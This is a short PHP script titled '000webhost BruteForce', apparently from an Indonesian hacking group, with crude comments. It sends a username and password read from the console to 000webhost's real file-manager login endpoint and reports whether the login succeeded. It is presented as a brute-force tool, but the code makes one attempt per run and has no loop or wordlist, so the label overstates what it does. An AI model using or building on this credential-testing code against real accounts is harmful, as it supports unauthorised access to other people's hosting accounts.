000webhost BruteForce

1. <?php
2. //===========CopyRight nih Tolo ajg Bangsd Jangan Diganti=============
3. //@Author : Fansa (IndoSec)
4. //@Kegunaan : Gaguna sumpah, Cuman 000webhost BruteForce
5. echo "Username : ";
6. $user = trim(fgets(STDIN, 1024));
7. echo "Password : ";
8. $passwd = trim(fgets(STDIN, 1024));
9. //===========CopyRight nih Tolo ajg Bangsd Jangan Diganti=============
10.  
11. //===========REQUEST METHOD=============
12. $data = '{"action":"login","username":"'.$user.'","password":"'.$passwd.'"}';
13. $ch = curl_init();
14. curl_setopt($ch, CURLOPT_POST, true);
15. curl_setopt($ch, CURLOPT_URL, 'https://files.000webhost.com/handler.php?action=login');
16. curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
17. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
18. curl_setopt($ch, CURLOPT_HEADER, 0);
19. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
20. $res = curl_exec($ch);
21. //===========REQUEST METHOD=============
22.  
23. //===========GET TITLE / Opsional=============
24. $ch2 = curl_init();
25. curl_setopt($ch2, CURLOPT_URL, 'https://files.000webhost.com/');
26. curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
27. curl_setopt($ch2, CURLOPT_HEADER, 0);
28. $res2 = curl_exec($ch2);
29. //===========GET TITLE / Opsional=============
30.  
31. //===========Info=============
32. preg_match('/<title>(.*?)<\/title>/',$res2,$title);
33. echo $title[1]."
34. ";
35. if (preg_match('/true/',$res)) {
36. preg_match('/<title>(.*?)<\/title>/',$res,$f);
37. echo "Sukses Login...
38.  
39. Response";
40. echo "
41. =========================
42. ";
43. print_r($res);
44. echo "
45. =========================
46. ";
47. } else {
48. echo "Gagal Login Bos...
49. ";
50. }
51. //===========Info=============
52. ?>